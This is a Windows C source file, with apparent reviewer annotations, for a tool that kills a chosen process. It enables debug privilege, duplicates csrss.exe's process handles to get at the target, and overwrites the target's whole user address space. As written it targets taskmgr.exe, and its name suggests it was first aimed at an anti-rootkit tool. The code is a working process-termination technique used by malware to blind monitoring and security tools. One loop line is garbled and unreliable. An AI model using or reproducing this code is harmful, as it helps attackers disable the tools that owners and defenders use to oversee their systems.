

#include   
#include   
#include  
#include   
#pragma comment (lib,"ntdll.lib")    // Copy From DDK  
#pragma comment (lib,"Kernel32.lib")  
#pragma comment (lib,"Advapi32.lib")  
#pragma comment(linker, "/ENTRY:main") 
 
/* Fallback for SDKs that lack ULONG_PTR. unsigned long is pointer-sized only on
 * 32-bit targets; the structs below also carry pointer-valued fields in ULONG,
 * so a 32-bit build is assumed throughout (a 64-bit build would mis-size them). */
#ifndef ULONG_PTR  
#define ULONG_PTR unsigned long 
#endif 
//------------------ data type declarations begin --------------------// 
/* Layout read back by the ZwQueryInformationProcess(..., 0, &pbi, ...) call in
 * KillIce; only UniqueProcessId is consumed there.
 * NTSTATUS is used here but is only typedef'd further down (after _CLIENT_ID),
 * so this compiles only if one of the (stripped) include lines already defines it.
 * NOTE(review): if <winternl.h> is among those includes, this redefines its
 * struct of the same name — confirm against the real include list. */
typedef struct _PROCESS_BASIC_INFORMATION { 
    NTSTATUS ExitStatus; 
    ULONG PebBaseAddress;        /* a pointer in the documented API; ULONG matches only on 32-bit */
    ULONG_PTR AffinityMask; 
    LONG BasePriority; 
    ULONG_PTR UniqueProcessId;   /* compared against the target PID in KillIce */
    ULONG_PTR InheritedFromUniqueProcessId; 
} PROCESS_BASIC_INFORMATION; 
typedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION; 
 
/* One entry of the SystemHandleInformation dump. KillIce reads the entry count
 * from the first ULONG of the buffer and walks these records from offset 4,
 * filtering on ProcessId and ObjectTypeNumber. Handle is a 16-bit handle value
 * belonging to the process named by ProcessId, not to this process. */
typedef struct _SYSTEM_HANDLE_INFORMATION 
{ 
    ULONG            ProcessId; 
    UCHAR            ObjectTypeNumber; 
    UCHAR            Flags; 
    USHORT            Handle; 
    PVOID            Object; 
    ACCESS_MASK        GrantedAccess; 
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;  
/* Not referenced anywhere in this file (SystemModuleInformation is defined below
 * but never queried). */
typedef struct _SYSTEM_MODULE_INFORMATION {  
  ULONG Reserved[2];  
  PVOID Base;  
  ULONG Size;  
  ULONG Flags;  
  USHORT Index;  
  USHORT Unknown;  
  USHORT LoadCount;  
  USHORT ModuleNameOffset;  
  CHAR ImageName[256];  
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;  
 
/* Passed to ZwOpenProcess in KillIce, which zero-fills the fields by hand
 * instead of using the InitializeObjectAttributes macro defined below. */
typedef struct _OBJECT_ATTRIBUTES {  
  ULONG Length;  
  HANDLE RootDirectory;  
  PUNICODE_STRING ObjectName;  
  ULONG Attributes;  
  PVOID SecurityDescriptor;  
  PVOID SecurityQualityOfService;  
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;  
 
/* Unused in this file. */
typedef enum _SECTION_INHERIT {  
  ViewShare = 1,  
  ViewUnmap = 2  
} SECTION_INHERIT;  
 
/* Unused in this file. */
typedef struct _MY_PROCESS_INFO {  
  ULONG PID;  
  ULONG KPEB;  
  ULONG CR3;  
  CHAR Name[16];  
  ULONG Reserved;  
} MY_PROCESS_INFO, *PMY_PROCESS_INFO; 
/* Names the process to open; KillIce sets UniqueProcess only (UniqueThread = 0). */
typedef struct _CLIENT_ID { 
    HANDLE UniqueProcess; 
    HANDLE UniqueThread; 
} CLIENT_ID; 
typedef CLIENT_ID *PCLIENT_ID;  
 
/* Declared after its first use in _PROCESS_BASIC_INFORMATION above; presumably
 * tolerated only because an included header already provides the same typedef. */
typedef long NTSTATUS;  
  
//------------------ data type declarations end --------------------//  
 
//--------------------- predefinitions begin -----------------------//  
/* Standard NTSTATUS success test (any non-negative status). Note that KillIce
 * compares return values against STATUS_SUCCESS directly rather than using it. */
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)  
/* Only STATUS_SUCCESS is used in this file; the other codes are informational. */
#define STATUS_SUCCESS        0x00000000  
#define STATUS_UNSUCCESSFUL      0xC0000001  
#define STATUS_NOT_IMPLEMENTED    0xC0000002  
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004  
#define STATUS_INVALID_PARAMETER  0xC000000D  
#define STATUS_ACCESS_DENIED    0xC0000022  
#define STATUS_BUFFER_TOO_SMALL  0xC0000023  
/* Unused in this file. */
#define OBJ_KERNEL_HANDLE      0x00000200  
/* SystemInformationClass values for ZwQuerySystemInformation; only
 * SystemHandleInformation (16) is queried in this file. */
#define SystemModuleInformation  11 
#define SystemHandleInformation  0x10  
 
/* Brace-block macro whose line continuations were apparently collapsed in this
 * listing. It is defined but never used (KillIce assigns the OBJECT_ATTRIBUTES
 * fields directly). Being a plain { } block rather than do { } while (0), a
 * trailing ';' after it would break an if/else that invokes it unbraced. */
#define InitializeObjectAttributes( p, n, a, r, s ) { (p)->Length = sizeof( OBJECT_ATTRIBUTES );(p)->RootDirectory = r;                (p)->Attributes = a;                    (p)->ObjectName = n;                      (p)->SecurityDescriptor = s;                (p)->SecurityQualityOfService = NULL;        }  
//--------------------- predefinitions end -----------------------//  
 
//------------------ Native API declarations begin ------------------//  
/* Despite the ntdll.lib pragma at the top, none of the Zw* routines is linked
 * statically: each is a function-pointer global that KillIce fills in at runtime
 * with GetProcAddress and that stays NULL until then. None of the pointers is
 * static, so every one is a writable, file-wide (and externally visible) global.
 * The block comment above each typedef is the prototype the author was working
 * from; where the typedef disagrees with it, a note says so. */
/* 
NTSYSAPI  
NTSTATUS  
NTAPI  
ZwQuerySystemInformation(  
  ULONG SystemInformationClass,  
  PVOID SystemInformation,  
  ULONG SystemInformationLength,  
  PULONG ReturnLength  
  );  
  */ 
typedef NTSTATUS (NTAPI* PNtZwQuerySystemInformation) (ULONG, PVOID, ULONG, PULONG); 
PNtZwQuerySystemInformation ZwQuerySystemInformation; 
/* 
NTSYSAPI  
NTSTATUS 
NTAPI 
ZwOpenProcess( 
 
  OUT PHANDLE            ProcessHandle, 
  IN ACCESS_MASK          AccessMask, 
  IN POBJECT_ATTRIBUTES  ObjectAttributes, 
  IN PCLIENT_ID          ClientId ); 
*/ 
typedef NTSTATUS (NTAPI* PNtZwOpenProcess) (OUT PHANDLE, IN ACCESS_MASK, IN POBJECT_ATTRIBUTES, 
											IN PCLIENT_ID); 
PNtZwOpenProcess ZwOpenProcess; 
/* 
NTSYSAPI  
NTSTATUS 
NTAPI 
ZwAllocateVirtualMemory( 
 
  IN HANDLE              ProcessHandle, 
  IN OUT PVOID            *BaseAddress, 
  IN ULONG                ZeroBits, 
  IN OUT PULONG          RegionSize, 
  IN ULONG                AllocationType, 
  IN ULONG                Protect ); 
*/ 
/* BaseAddress is PVOID* in the prototype above but PVOID in the typedef; the
 * caller passes &buf, which converts implicitly, so it works but is unchecked. */
typedef NTSTATUS (NTAPI* PNtZwAllocateVirtualMemory) (IN HANDLE, IN OUT PVOID, 
													  IN ULONG, IN OUT PULONG, 
													  IN ULONG, IN ULONG); 
PNtZwAllocateVirtualMemory ZwAllocateVirtualMemory; 
/* 
NTSYSAPI  
NTSTATUS 
NTAPI 
ZwDuplicateObject( 
 
  IN HANDLE              SourceProcessHandle, 
  IN PHANDLE              SourceHandle, 
  IN HANDLE              TargetProcessHandle, 
  OUT PHANDLE            TargetHandle, 
  IN ACCESS_MASK          DesiredAccess OPTIONAL, 
  IN BOOLEAN              InheritHandle, 
  IN ULONG                Options );*/ 
/* NOTE(review): SourceHandle is PHANDLE here, and KillIce casts a USHORT handle
 * value to PHANDLE to match. The documented native API takes SourceHandle by
 * value (HANDLE), so the PHANDLE in both the comment and the typedef looks like
 * a declaration slip that the cast papers over — verify before relying on it. */
typedef NTSTATUS (NTAPI* PNtZwDuplicateObject) ( IN HANDLE, IN PHANDLE, IN HANDLE, OUT PHANDLE, 
												IN ACCESS_MASK, IN BOOLEAN,  IN ULONG); 
PNtZwDuplicateObject ZwDuplicateObject; 
 
/* 
NTSYSAPI  
NTSTATUS 
NTAPI 
ZwQueryInformationProcess( 
 
  IN HANDLE              ProcessHandle, 
  IN PVOID         ProcessInformationClass, 
  OUT PVOID              ProcessInformation, 
  IN ULONG                ProcessInformationLength, 
  OUT PULONG              ReturnLength );*/ 
/* ProcessInformationClass is declared PVOID although the class is an integer
 * (PROCESSINFOCLASS); KillIce passes the literal 0, which converts silently. */
typedef NTSTATUS(NTAPI* PNtZwQueryInformationProcess)(IN HANDLE, IN PVOID, OUT PVOID, IN ULONG, OUT PULONG ); 
PNtZwQueryInformationProcess ZwQueryInformationProcess; 
 
/* 
NTSYSAPI  
NTSTATUS 
NTAPI 
ZwProtectVirtualMemory( 
 
  IN HANDLE              ProcessHandle, 
  IN OUT PVOID            *BaseAddress, 
  IN OUT PULONG          NumberOfBytesToProtect, 
  IN ULONG                NewAccessProtection, 
  OUT PULONG              OldAccessProtection );*/ 
/* Same PVOID* vs PVOID mismatch on BaseAddress as ZwAllocateVirtualMemory. */
typedef NTSTATUS (NTAPI* PNtZwProtectVirtualMemory) (IN HANDLE, IN OUT PVOID, IN OUT PULONG, IN ULONG , OUT PULONG); 
PNtZwProtectVirtualMemory ZwProtectVirtualMemory; 
/* 
NTSYSAPI  
NTSTATUS 
NTAPI 
ZwWriteVirtualMemory( 
 
  IN HANDLE              ProcessHandle, 
  IN PVOID                BaseAddress, 
  IN PVOID                Buffer, 
  IN ULONG                NumberOfBytesToWrite, 
  OUT PULONG              NumberOfBytesWritten OPTIONAL ); 
*/ 
typedef NTSTATUS (NTAPI *PNtZwWriteVirtualMemory) ( IN HANDLE, IN PVOID, IN PVOID, IN ULONG, OUT PULONG ); 
PNtZwWriteVirtualMemory ZwWriteVirtualMemory; 
 
/* 
NTSYSAPI  
NTSTATUS 
NTAPI 
ZwClose( 
 
  IN HANDLE              ObjectHandle ); 
*/ 
typedef NTSTATUS (NTAPI *PNtZwClose) ( IN HANDLE ); 
PNtZwClose ZwClose; 
/* 
NTSYSAPI  
NTSTATUS 
NTAPI 
ZwFreeVirtualMemory( 
 
  IN HANDLE              ProcessHandle, 
  IN PVOID                *BaseAddress, 
  IN OUT PULONG          RegionSize, 
  IN ULONG                FreeType ); 
*/ 
 
/* Same PVOID* vs PVOID mismatch on BaseAddress as ZwAllocateVirtualMemory. */
typedef NTSTATUS (NTAPI *PNtZwFreeVirtualMemory)( IN HANDLE, IN PVOID, IN OUT PULONG, IN ULONG ); 
PNtZwFreeVirtualMemory ZwFreeVirtualMemory; 
 
//------------------ Native API declarations end ------------------//  
 
//------------------ 程序正式开始 ------------------//  
 
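/*
 * GetPidByName - look up a running process by executable name.
 *
 * Walks a Toolhelp process snapshot and returns the PID of the first entry
 * whose szExeFile matches szName case-insensitively (lstrcmpi), or 0 when
 * szName is NULL, the snapshot cannot be taken, or nothing matches.
 *
 * Callers test the result with `if (Pid)`; note that 0 is also the PID of the
 * System Idle Process, so "not found" is an in-band sentinel here.
 *
 * Fix over the previous version: the snapshot handle was leaked when
 * Process32First failed (early `return 0` before CloseHandle). All paths past
 * a successful CreateToolhelp32Snapshot now close it.
 */
DWORD GetPidByName(char *szName) 
{ 
	PROCESSENTRY32 pe32 = {0}; 
	DWORD dwRet = 0; 
	HANDLE hProcessSnap; 

	/* lstrcmpi on a NULL name is not meaningful; treat it as "not found". */ 
	if (szName == NULL) 
		return 0; 

	hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 
	if (hProcessSnap == INVALID_HANDLE_VALUE) 
		return 0; 

	/* dwSize must be set before the first call or Process32First fails. */ 
	pe32.dwSize = sizeof(pe32); 
	if (Process32First(hProcessSnap, &pe32)) 
	{ 
		do 
		{ 
			if (lstrcmpi(szName, pe32.szExeFile) == 0) 
			{ 
				dwRet = pe32.th32ProcessID;   /* first match wins */ 
				break; 
			} 
		} while (Process32Next(hProcessSnap, &pe32)); 
	} 

	/* Single exit: the snapshot is released whether or not a match was found
	 * and whether or not Process32First succeeded. */ 
	CloseHandle(hProcessSnap); 
	return dwRet; 
} 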
 
/*
 * KillIce - destroys the address space of the process whose PID is dwProcessId,
 * working through a handle duplicated out of csrss.exe rather than a handle
 * opened on the target directly. As written below the sequence is:
 *   1. resolve nine Zw* entry points from ntdll at runtime (GetProcAddress);
 *   2. open csrss.exe with PROCESS_ALL_ACCESS (main() enables SeDebugPrivilege
 *      beforehand);
 *   3. dump the system handle table (SystemHandleInformation) into a fixed
 *      4 MiB buffer and walk it for csrss.exe handles with ObjectTypeNumber 5;
 *   4. duplicate each such handle into this process and ask
 *      ZwQueryInformationProcess which PID it refers to;
 *   5. on a PID match, make every 4 KiB page from 0x1000 up to 0x80000000
 *      writable and overwrite it with the first page of the dump buffer.
 *
 * Defensive note: every step here is visible to host telemetry — a process
 * enabling SeDebugPrivilege, opening csrss.exe with full access, duplicating
 * its handles, and then issuing ZwProtectVirtualMemory/ZwWriteVirtualMemory
 * against a third process is a sequence worth alerting on as a whole.
 *
 * Correctness issues, left unchanged (documentation-only review):
 *  - only ZwDuplicateObject and ZwProtectVirtualMemory have their status
 *    checked; ph, buf contents and pbi may be uninitialised when used;
 *  - the handle dump is capped at 0x400000 bytes with no retry on
 *    STATUS_INFO_LENGTH_MISMATCH, and the count is read from buf regardless;
 *  - the loop header on the "for (i= 0 ; i" line is garbled in this listing
 *    (the bound and the `if (` that opens the filter were lost in extraction);
 *  - the inner page loop reuses i, so after a match the outer walk terminates;
 *  - h_dup is closed only on a match, and pbi is compared even when the
 *    duplicate failed and nothing was queried into it;
 *  - the LoadLibrary("ntdll") reference is released only on the success path;
 *    every early `return ;` above FreeLibrary leaks it;
 *  - 32-bit only: addresses travel in ULONG and the sweep stops at 2 GiB.
 */
void KillIce(ULONG dwProcessId)  
{  
	HMODULE hNTDLL = LoadLibrary ("ntdll");   /* return unchecked; used only for FreeLibrary at the end */ 
	HANDLE     ph, h_dup; 
	ULONG     bytesIO;                        /* reused as region size, query length, and bytes-written */ 
	PVOID     buf; 
	ULONG        i;                           /* shared by the handle walk and the page sweep */ 
	CLIENT_ID    cid1; 
	OBJECT_ATTRIBUTES    attr; 
	HANDLE        csrss_id; 
	PROCESS_BASIC_INFORMATION    pbi;         /* never initialised; compared below even when not filled */ 
	PVOID        p0, p1; 
	ULONG        sz, oldp; 
	ULONG        NumOfHandle; 
	PSYSTEM_HANDLE_INFORMATION    h_info;   
 
	/* Second, separate ntdll handle; this one is used for the lookups. */ 
	HMODULE hNtDll = ::GetModuleHandle( "ntdll.dll" ); 
	if( hNtDll == NULL ) return ; 
 
// function pointer resolution ++ 
	// ZwQuerySystemInformation 
	ZwQuerySystemInformation = (PNtZwQuerySystemInformation)GetProcAddress( hNtDll, 
										"ZwQuerySystemInformation" ); 
	if( ZwQuerySystemInformation == NULL ) return ; 
	 
	// ZwOpenProcess 
	ZwOpenProcess = (PNtZwOpenProcess)GetProcAddress( hNtDll, 
										"ZwOpenProcess" ); 
	if( ZwOpenProcess == NULL ) return ; 
 
	// ZwAllocateVirtualMemory 
	ZwAllocateVirtualMemory = (PNtZwAllocateVirtualMemory)GetProcAddress( hNtDll, 
										"ZwAllocateVirtualMemory" ); 
	if( ZwAllocateVirtualMemory == NULL ) return ; 
 
	// ZwDuplicateObject 
	ZwDuplicateObject = (PNtZwDuplicateObject)GetProcAddress( hNtDll, 
										"ZwDuplicateObject" ); 
	if( ZwDuplicateObject == NULL ) return ; 
 
	// ZwQueryInformationProcess 
	ZwQueryInformationProcess = (PNtZwQueryInformationProcess)GetProcAddress( hNtDll, 
										"ZwQueryInformationProcess" ); 
	if( ZwQueryInformationProcess == NULL ) return ; 
 
	// ZwProtectVirtualMemory 
	ZwProtectVirtualMemory = (PNtZwProtectVirtualMemory)GetProcAddress( hNtDll, 
										"ZwProtectVirtualMemory" ); 
	if( ZwProtectVirtualMemory == NULL ) return ; 
 
	// ZwWriteVirtualMemory 
	ZwWriteVirtualMemory = (PNtZwWriteVirtualMemory)GetProcAddress( hNtDll, 
										"ZwWriteVirtualMemory" ); 
	if( ZwWriteVirtualMemory == NULL ) return ; 
 
	// ZwClose 
	ZwClose = (PNtZwClose)GetProcAddress( hNtDll, 
										"ZwClose" ); 
	if( ZwClose == NULL ) return ; 
 
	// ZwFreeVirtualMemory 
	ZwFreeVirtualMemory = (PNtZwFreeVirtualMemory)GetProcAddress( hNtDll, 
										"ZwFreeVirtualMemory" ); 
	if( ZwFreeVirtualMemory == NULL ) return ; 
 
// function pointer resolution -- 
 
	/* 0 here means csrss.exe was not found; the value is still used below. */ 
	csrss_id = (HANDLE)GetPidByName("csrss.exe"); 
	/* OBJECT_ATTRIBUTES filled by hand (the InitializeObjectAttributes macro is not used). */ 
	attr.Length = sizeof(OBJECT_ATTRIBUTES); 
	attr.RootDirectory = 0; 
	attr.ObjectName = 0; 
	attr.Attributes = 0; 
	attr.SecurityDescriptor = 0; 
	attr.SecurityQualityOfService = 0; 
 
	cid1.UniqueProcess = csrss_id; 
	cid1.UniqueThread = 0; 
	/* Status unchecked: on failure ph is left uninitialised and still used below. */ 
	ZwOpenProcess(&ph, PROCESS_ALL_ACCESS, &attr, &cid1); 
 
	/* Fixed 4 MiB buffer for the handle dump; neither call's status is checked,
	 * so an oversized handle table (STATUS_INFO_LENGTH_MISMATCH) is not noticed. */ 
	bytesIO = 0x400000; 
	buf = 0; 
	ZwAllocateVirtualMemory(GetCurrentProcess(), &buf, 0, &bytesIO, MEM_COMMIT, PAGE_READWRITE); 
	ZwQuerySystemInformation(SystemHandleInformation, buf, 0x400000, &bytesIO); 
	/* Dump layout as read here: entry count in the first ULONG, entries from +4. */ 
	NumOfHandle = (ULONG)buf; 
	h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4); 
 
	/* GARBLED IN THIS LISTING: the for-loop bound and the `if (` opening the
	 * filter were lost between "i" and "ProcessId". The intent readable from
	 * what remains: iterate the NumOfHandle entries and select those owned by
	 * csrss_id with ObjectTypeNumber 5 (presumably the Process object type
	 * index on the targeted OS build — version-specific, verify). */ 
	for (i= 0 ; iProcessId == (ULONG)csrss_id)&&(h_info->ObjectTypeNumber == 5)) 
		{ 
			/* USHORT handle value cast to PHANDLE purely to satisfy the typedef. */ 
			if (ZwDuplicateObject(ph, (PHANDLE)h_info->Handle, (HANDLE)-1, &h_dup, 
									0, 0, DUPLICATE_SAME_ACCESS) == STATUS_SUCCESS) 
				/* class 0 = ProcessBasicInformation; only pbi.UniqueProcessId is used */ 
				ZwQueryInformationProcess(h_dup, 0, &pbi, sizeof(pbi), &bytesIO); 
			/* Evaluated even when the duplicate failed and pbi was never written. */ 
			if (pbi.UniqueProcessId == dwProcessId) 
			{ 
				MessageBox(0, "目标已确定!", "OK", MB_OK); 
				/* Reuses the outer index i: when this sweep ends, i >= 0x80000000
				 * and the handle walk terminates as well. */ 
				for (i = 0x1000; i<0x80000000; i = i + 0x1000) 
				{ 
					p0 = (PVOID)i; 
					p1 = p0;        /* p1 may be adjusted by the call; p0 keeps the requested page */ 
					sz = 0x1000; 
					if (ZwProtectVirtualMemory(h_dup, &p1, &sz, PAGE_EXECUTE_READWRITE, &oldp) == STATUS_SUCCESS) 
					{               
						/* Overwrites the page with the first 0x1000 bytes of the
						 * handle dump; bytes-written lands in oldp (variable reuse). */ 
						ZwWriteVirtualMemory(h_dup, p0, buf, 0x1000, &oldp); 
					}           
					} 
					MessageBox(0, "任务已完成!","OK", 0); 
					/* Only closed on a match; non-matching duplicates leak. */ 
					ZwClose(h_dup);                         
				} 
			} 
	} 
 
	/* RegionSize 0 with MEM_RELEASE frees the whole region allocated above. */ 
	bytesIO = 0; 
	ZwFreeVirtualMemory(GetCurrentProcess(), &buf, &bytesIO, MEM_RELEASE); 
	/* ph is never closed; hNTDLL is released only on this path. */ 
	FreeLibrary(hNTDLL);     
} 
 
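/*
 * EnablePrivilege - enable or disable one named privilege on an access token.
 *
 * hToken      token opened with at least TOKEN_ADJUST_PRIVILEGES.
 * szPrivName  privilege name (e.g. SE_DEBUG_NAME) resolved with LookupPrivilegeValue.
 * fEnable     TRUE to set SE_PRIVILEGE_ENABLED, FALSE to clear the attribute.
 *
 * Returns TRUE only when the privilege was actually adjusted. Changes over the
 * previous version: a NULL token or name is rejected, a failed
 * LookupPrivilegeValue no longer lets an uninitialised LUID reach
 * AdjustTokenPrivileges, and a FALSE from AdjustTokenPrivileges is reported
 * instead of being masked by whatever GetLastError happened to hold.
 */
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable) 
{ 
	TOKEN_PRIVILEGES tp = {0}; 

	if (hToken == NULL || szPrivName == NULL) 
		return FALSE; 

	/* Without a resolved LUID the adjustment below would act on garbage. */ 
	if (!LookupPrivilegeValue(NULL, szPrivName, &tp.Privileges[0].Luid)) 
		return FALSE; 

	tp.PrivilegeCount = 1; 
	tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED : 0; 

	if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL)) 
		return FALSE; 

	/* AdjustTokenPrivileges returns TRUE even when the privilege is not held by
	 * the token (last error ERROR_NOT_ALL_ASSIGNED), so the last-error check is
	 * what distinguishes "adjusted" from "silently skipped". */ 
	return (GetLastError() == ERROR_SUCCESS); 
} 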
 
/*
 * Program entry point. The /ENTRY:main pragma at the top of the file points the
 * linker here directly, so C runtime start-up is presumably skipped — which is
 * consistent with leaving via ExitProcess instead of returning.
 *
 * Enables SeDebugPrivilege on the current process token, then hands the PID of
 * taskmgr.exe, if it is running, to KillIce.
 *
 * Review notes: OpenProcessToken's result is not checked, so hToken is
 * uninitialised if it fails; EnablePrivilege's result is ignored, so KillIce
 * runs even when the privilege was not granted; hToken is never closed;
 * `if (Pid = ...)` assigns inside the condition; `void main()` is non-standard.
 */
void main()  
{     
    ULONG Pid; 
    HANDLE hToken; 
    OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken); 
    EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE); 
    /* GetPidByName returns 0 for "not found" (also the idle process's PID). */ 
    if (Pid = GetPidByName("taskmgr.exe")) 
    { 
        KillIce(Pid); 
    }      
    ExitProcess(0); 
}